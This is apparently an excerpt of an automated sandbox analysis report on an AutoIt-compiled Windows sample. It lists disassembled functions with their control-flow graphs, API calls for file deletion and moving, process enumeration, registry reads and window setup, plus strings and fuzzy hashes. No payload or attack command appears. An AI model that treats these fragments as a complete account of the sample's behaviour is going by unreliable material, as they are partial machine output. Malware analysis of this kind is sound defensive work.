                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                          • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                          • API String ID: 529118366-2030392706
                                          • Opcode ID: ad4623ffb41c9557d635101dd40b4832555e1b7a34bc0d4b132cdce1deb5c90e
                                          • Instruction ID: 4dca7a9009b973230876e426ee1736dc2d3be425ecc69871cc06c05457b3f6bd
                                          • Opcode Fuzzy Hash: ad4623ffb41c9557d635101dd40b4832555e1b7a34bc0d4b132cdce1deb5c90e
                                          • Instruction Fuzzy Hash: DB51F434948248AECB12ABB0DC46FED7B74AF1A381F14416DF565621E3DFB05AC5CB21
                                          Function 00113CE2 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 823 113ce2-113d48 call c1207 * 4 call d0284 * 2 call 114f82 call 114fec 840 113d53-113d5d call 114fec 823->840 841 113d4a-113d4e call c1900 823->841 845 113d68-113da6 call c1207 * 2 call d0119 FindFirstFileW 840->845 846 113d5f-113d63 call c1900 840->846 841->840 854 113eb4-113ebb FindClose 845->854 855 113dac 845->855 846->845 857 113ebe-113ef6 call c1cb6 * 6 854->857 856 113db2-113db4 855->856 856->854 858 113dba-113dc1 856->858 860 113dc7-113e1f call c1a36 call 114561 call c1cb6 call c1c9c call c17e0 call c1900 call 11412a 858->860 861 113e88-113e9b FindNextFileW 858->861 888 113e21-113e24 860->888 889 113e40-113e44 860->889 861->856 864 113ea1-113ea6 861->864 864->856 890 113eab-113eb2 FindClose 888->890 891 113e2a-113e3c call c151f 888->891 892 113e72-113e78 call 113ef7 889->892 893 113e46-113e49 889->893 890->857 900 113e4e-113e57 MoveFileW 891->900 904 113e3e DeleteFileW 891->904 898 113e7d 892->898 896 113e59-113e69 call 113ef7 893->896 897 113e4b 893->897 896->890 905 113e6b-113e70 DeleteFileW 896->905 897->900 903 113e80-113e82 898->903 900->903 903->890 906 113e84 903->906 904->889 905->903 906->861
                                          APIs
                                            • Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4
                                            • Part of subcall function 00114FEC: GetFileAttributesW.KERNEL32(?,00113BFE), ref: 00114FED
                                          • FindFirstFileW.KERNEL32(?,?), ref: 00113D96
                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00113E3E
                                          • MoveFileW.KERNEL32(?,?), ref: 00113E51
                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00113E6E
                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00113E90
                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00113EAC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 4002782344-1173974218
                                          • Opcode ID: f2f2d444400fdbaee13d7b2b171f234bfc17674f2850f024c559256c13f09948
                                          • Instruction ID: 64c32b0b35f1365618dd413834627f7a33bb3160d3e5c1ef1b28581780689cfc
                                          • Opcode Fuzzy Hash: f2f2d444400fdbaee13d7b2b171f234bfc17674f2850f024c559256c13f09948
                                          • Instruction Fuzzy Hash: DB51903580120DABCF19EBA0C992EEDB779AF16300F200169E452B7197EF316F49CB60
                                          Function 000C5D13 Relevance: 10.7, APIs: 7, Instructions: 223COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 957 c5d13-c5d73 call c1207 GetVersionExW call c1821 962 c5e78-c5e7a 957->962 963 c5d79 957->963 964 100fa9-100fb5 962->964 965 c5d7c-c5d81 963->965 966 100fb6-100fba 964->966 967 c5e7f-c5e80 965->967 968 c5d87 965->968 970 100fbc 966->970 971 100fbd-100fc9 966->971 969 c5d88-c5dbf call c1981 call c133d 967->969 968->969 980 101098-10109b 969->980 981 c5dc5-c5dc6 969->981 970->971 971->966 972 100fcb-100fd0 971->972 972->965 974 100fd6-100fdd 972->974 974->964 976 100fdf 974->976 979 100fe4-100fea 976->979 986 c5e00-c5e17 GetCurrentProcess IsWow64Process 979->986 982 1010b4-1010b8 980->982 983 10109d 980->983 984 c5dcc-c5dcf 981->984 985 100fef-100ffa 981->985 991 1010a3-1010ac 982->991 992 1010ba-1010c3 982->992 989 1010a0 983->989 984->986 990 c5dd1-c5def 984->990 987 101017-101019 985->987 988 100ffc-101002 985->988 993 c5e1c-c5e2d 986->993 994 c5e19 986->994 998 10101b-101027 987->998 999 10103c-10103f 987->999 995 101004-101007 988->995 996 10100c-101012 988->996 989->991 990->986 997 c5df1-c5df7 990->997 991->982 992->989 1000 1010c5-1010c8 992->1000 1001 c5e2f-c5e3f call c55f0 993->1001 1002 c5e98-c5ea2 GetSystemInfo 993->1002 994->993 995->986 996->986 997->979 1003 c5dfd 997->1003 1004 101031-101037 998->1004 1005 101029-10102c 998->1005 1007 101041-101050 999->1007 1008 101065-101068 999->1008 1000->991 1014 c5e8c-c5e96 GetSystemInfo 1001->1014 1015 c5e41-c5e4e call c55f0 1001->1015 1006 c5e65-c5e75 1002->1006 1003->986 1004->986 1005->986 1010 101052-101055 1007->1010 1011 10105a-101060 1007->1011 1008->986 1013 10106e-101083 1008->1013 1010->986 1011->986 1016 101085-101088 1013->1016 1017 10108d-101093 1013->1017 1018 c5e56-c5e5a 1014->1018 1022 c5e85-c5e8a 1015->1022 1023 c5e50-c5e54 GetNativeSystemInfo 1015->1023 1016->986 1017->986 1018->1006 1021 c5e5c-c5e5f FreeLibrary 1018->1021 1021->1006 1022->1023 1023->1018
                                          APIs
                                          • GetVersionExW.KERNEL32(?), ref: 000C5D40
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          • GetCurrentProcess.KERNEL32(?,00140A18,00000000,00000000,?), ref: 000C5E07
                                          • IsWow64Process.KERNEL32(00000000), ref: 000C5E0E
                                          • GetNativeSystemInfo.KERNEL32(00000000), ref: 000C5E54
                                          • FreeLibrary.KERNEL32(00000000), ref: 000C5E5F
                                          • GetSystemInfo.KERNEL32(00000000), ref: 000C5E90
                                          • GetSystemInfo.KERNEL32(00000000), ref: 000C5E9C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                          • String ID:
                                          • API String ID: 1986165174-0
                                          • Opcode ID: 580ec2f2fe32f30be933fdda2e3cb7e4e6e9a4e52edaa6f0ffa6fdb694b2ec86
                                          • Instruction ID: 64feae22f5b60498fbcc986de67000b9585071e510987b18fa76d2eead56d5d9
                                          • Opcode Fuzzy Hash: 580ec2f2fe32f30be933fdda2e3cb7e4e6e9a4e52edaa6f0ffa6fdb694b2ec86
                                          • Instruction Fuzzy Hash: D691F635549BC0DEC735CB788850AAFBFE56F2A301B880A5ED0C793A82D274B588D759
                                          Function 00114005 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1024 114005-11404c call c1207 * 3 call d0284 call 114fec 1035 11405c-11408d call d0119 FindFirstFileW 1024->1035 1036 11404e-114057 call c1900 1024->1036 1040 1140fc-114103 FindClose 1035->1040 1041 11408f-114091 1035->1041 1036->1035 1043 114107-114129 call c1cb6 * 3 1040->1043 1041->1040 1042 114093-114098 1041->1042 1044 1140d7-1140e9 FindNextFileW 1042->1044 1045 11409a-1140d5 call c1c9c call c17e0 call c1900 DeleteFileW 1042->1045 1044->1041 1049 1140eb-1140f1 1044->1049 1045->1044 1059 1140f3-1140fa FindClose 1045->1059 1049->1041 1059->1043
                                          APIs
                                            • Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4
                                            • Part of subcall function 00114FEC: GetFileAttributesW.KERNEL32(?,00113BFE), ref: 00114FED
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0011407C
                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 001140CC
                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 001140DD
                                          • FindClose.KERNEL32(00000000), ref: 001140F4
                                          • FindClose.KERNEL32(00000000), ref: 001140FD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                          • String ID: \*.*
                                          • API String ID: 2649000838-1173974218
                                          • Opcode ID: d52aa292c22c9d04c792a00f2863849ad2e98a5e436d96f9ea90d4548deb3667
                                          • Instruction ID: 76ccbe3ce90d48f41d43ce5197f4cb1b6f5eb1796945d0d9712e379d8eb4256c
                                          • Opcode Fuzzy Hash: d52aa292c22c9d04c792a00f2863849ad2e98a5e436d96f9ea90d4548deb3667
                                          • Instruction Fuzzy Hash: C4315E350083859BC205EF64C895EEFB7A8BF9A704F444A2DF5E582193DB30DA49C763
                                          Function 00114148 Relevance: 6.1, APIs: 4, Instructions: 85processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0011416D
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0011417B
                                          • Process32NextW.KERNEL32(00000000,?), ref: 0011419B
                                          • CloseHandle.KERNEL32(00000000), ref: 00114245
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                          • String ID:
                                          • API String ID: 420147892-0
                                          • Opcode ID: 4d6db1060924986fb8858f8d7cb62a991b4992e759189794b79caa9ab3536a7f
                                          • Instruction ID: d8a4fbbd49749873b28b83e60f3c600c91a144fd0880d3cca4169d5be3ba7c64
                                          • Opcode Fuzzy Hash: 4d6db1060924986fb8858f8d7cb62a991b4992e759189794b79caa9ab3536a7f
                                          • Instruction Fuzzy Hash: A63182711083419FD305EF50E885FEFBBE8AF9A750F40052DF585821A2EB719989CB92
                                          Function 000BB020 Relevance: 5.6, APIs: 3, Instructions: 1146COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 000C3740: CharUpperBuffW.USER32(?,001771DC,00000000,?,00000000,001771DC,?,000B53A5,?,?,?,?), ref: 000C375D
                                          • _memmove.LIBCMT ref: 000BB68A
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharUpper_memmove
                                          • String ID:
                                          • API String ID: 2819905725-0
                                          • Opcode ID: ac3932016782984b9a9a68948ff145114d426837d39f94e6007741b8ac3ff3da
                                          • Instruction ID: 16c67450cb448f05cfcb58a7eb62cc52b3d499f6d8c387fb27802cdbfde9f146
                                          • Opcode Fuzzy Hash: ac3932016782984b9a9a68948ff145114d426837d39f94e6007741b8ac3ff3da
                                          • Instruction Fuzzy Hash: 99A29C706087419FD760DF18C480BAAB7E1FF84314F14896DE99A8B762DBB0ED45CB92
                                          Function 0011494A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,000FFC86), ref: 0011495A
                                          • FindFirstFileW.KERNEL32(?,?), ref: 0011496B
                                          • FindClose.KERNEL32(00000000), ref: 0011497B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FileFind$AttributesCloseFirst
                                          • String ID:
                                          • API String ID: 48322524-0
                                          • Opcode ID: c062df808a333d9ffc4317ee44292122711290dca4765ec4b5e7b04d318200b1
                                          • Instruction ID: 587e7285880d6934010d2fef17a1ba855d070927baac4c4c3b3f0b7409aa6b5f
                                          • Opcode Fuzzy Hash: c062df808a333d9ffc4317ee44292122711290dca4765ec4b5e7b04d318200b1
                                          • Instruction Fuzzy Hash: 87E0DF3582090AAB9214A738EC0D8EA775C9F0F73DF100729FA35C24E0EBB099C48696
                                          Function 000B94E0 Relevance: 3.5, APIs: 2, Instructions: 539COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3b7ed3d36e3b9364d11a5f49c114e4daf846d8727e412eb0a705b3adc704f76c
                                          • Instruction ID: 75e3bb00de263771d8602ce05effde71d0c95e1e1243d32bffa44483dd379d7f
                                          • Opcode Fuzzy Hash: 3b7ed3d36e3b9364d11a5f49c114e4daf846d8727e412eb0a705b3adc704f76c
                                          • Instruction Fuzzy Hash: 5922AD7090421ADFDB64DF58C480AFEB7F0FF19300F14816AEA56AB352D774A985CB91
                                          Function 000BBC70 Relevance: 50.4, APIs: 22, Strings: 6, Instructions: 1379sleeptimeCOMMON
                                          Download Yara Rule
                                          APIs
                                          • timeGetTime.WINMM ref: 000BBF57
                                            • Part of subcall function 000B52B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000B52E6
                                          • Sleep.KERNEL32(0000000A,?,?), ref: 000F36B5
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessagePeekSleepTimetime
                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                          • API String ID: 1792118007-922114024
                                          • Opcode ID: 57c71affaa39caec0e2576abbd8f0843152733e1699470a42fc91bf2f551ea52
                                          • Instruction ID: 3ca7dc7b29663bd768e97a45bb1a31a517646096c68ed738960e960f5fb8dd74
                                          • Opcode Fuzzy Hash: 57c71affaa39caec0e2576abbd8f0843152733e1699470a42fc91bf2f551ea52
                                          • Instruction Fuzzy Hash: DCC2AD70608341DFD728DF24C884BAEB7E5BF84314F14491DF69A976A2CB71E984DB82
                                          Function 000B33E7 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 72windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 000B3444
                                          • RegisterClassExW.USER32(00000030), ref: 000B346E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B347F
                                          • InitCommonControlsEx.COMCTL32(?), ref: 000B349C
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B34AC
                                          • LoadIconW.USER32(000000A9), ref: 000B34C2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B34D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: e7f70ed0ec654e4efdcf624bf66c8a24d6b459de306ad687279ee6f7f425e6dc
                                          • Instruction ID: 7a980efae206888d325cfcd525d49b11b8a92c04a10c18575955d05e4cead983
                                          • Opcode Fuzzy Hash: e7f70ed0ec654e4efdcf624bf66c8a24d6b459de306ad687279ee6f7f425e6dc
                                          • Instruction Fuzzy Hash: F33125B1844309AFDB528FA4DC89AC9BBF0FF0A310F10455AE694E66A0D3B915C1CF92
                                          Function 000B3411 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 000B3444
                                          • RegisterClassExW.USER32(00000030), ref: 000B346E
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B347F
                                          • InitCommonControlsEx.COMCTL32(?), ref: 000B349C
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B34AC
                                          • LoadIconW.USER32(000000A9), ref: 000B34C2
                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B34D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                          • API String ID: 2914291525-1005189915
                                          • Opcode ID: 19e24c0f15a5f894a80235bd2a46895a05fe8b459f23f5b47dd88a56f128c286
                                          • Instruction ID: b5e7e8386d21bc557ad486613bd5dc8f2986011b62d2b6122d5fe3866320c3cc
                                          • Opcode Fuzzy Hash: 19e24c0f15a5f894a80235bd2a46895a05fe8b459f23f5b47dd88a56f128c286
                                          • Instruction Fuzzy Hash: 0C21E4B5954308AFDB01DFA5EC89BDDBBF4FB09701F10411AFA14A66A0D7B11580CF92
                                          Function 000C2FC5 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 000D00CF: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,000C3094), ref: 000D00ED
                                            • Part of subcall function 000D08C1: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,000C309F), ref: 000D08E3
                                          • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000C30E2
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 001001BA
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 001001FB
                                          • RegCloseKey.ADVAPI32(?), ref: 00100239
                                          • _wcscat.LIBCMT ref: 00100292
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 2673923337-2727554177
                                          • Opcode ID: b00c2dcfade66fa35d4f0a62ab861659adf45dea6f47620884b5916a69f8acaa
                                          • Instruction ID: 88273f9143eb242e3e0767153543137d3b43dfc37f89a917f557c5d624935ada
                                          • Opcode Fuzzy Hash: b00c2dcfade66fa35d4f0a62ab861659adf45dea6f47620884b5916a69f8acaa
                                          • Instruction Fuzzy Hash: 93716E714493019AC305EF65D889AAFBBF8FF59351F40052EF489972B2EF709984CB52
                                          Function 000C514C Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 000C5156
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 000C5165
                                          • LoadIconW.USER32(00000063), ref: 000C517C
                                          • LoadIconW.USER32(000000A4), ref: 000C518E
                                          • LoadIconW.USER32(000000A2), ref: 000C51A0
                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C51C6
                                          • RegisterClassExW.USER32(?), ref: 000C521C
                                            • Part of subcall function 000B3411: GetSysColorBrush.USER32(0000000F), ref: 000B3444
                                            • Part of subcall function 000B3411: RegisterClassExW.USER32(00000030), ref: 000B346E
                                            • Part of subcall function 000B3411: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000B347F
                                            • Part of subcall function 000B3411: InitCommonControlsEx.COMCTL32(?), ref: 000B349C
                                            • Part of subcall function 000B3411: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000B34AC
                                            • Part of subcall function 000B3411: LoadIconW.USER32(000000A9), ref: 000B34C2
                                            • Part of subcall function 000B3411: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 000B34D1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: d131a4a2a73f98b169b528147f94eb8823d91bf13d6429951d4b7bb3a3dce386
                                          • Instruction ID: a315a7cc2690b025b2990bcee9888a7b1e4c28343014fbe1a41104d83578cf23
                                          • Opcode Fuzzy Hash: d131a4a2a73f98b169b528147f94eb8823d91bf13d6429951d4b7bb3a3dce386
                                          • Instruction Fuzzy Hash: E0214874944308AFEB119FA5ED09B9DBBB5FB08311F00012AF618A66E2D7B665D0CF84
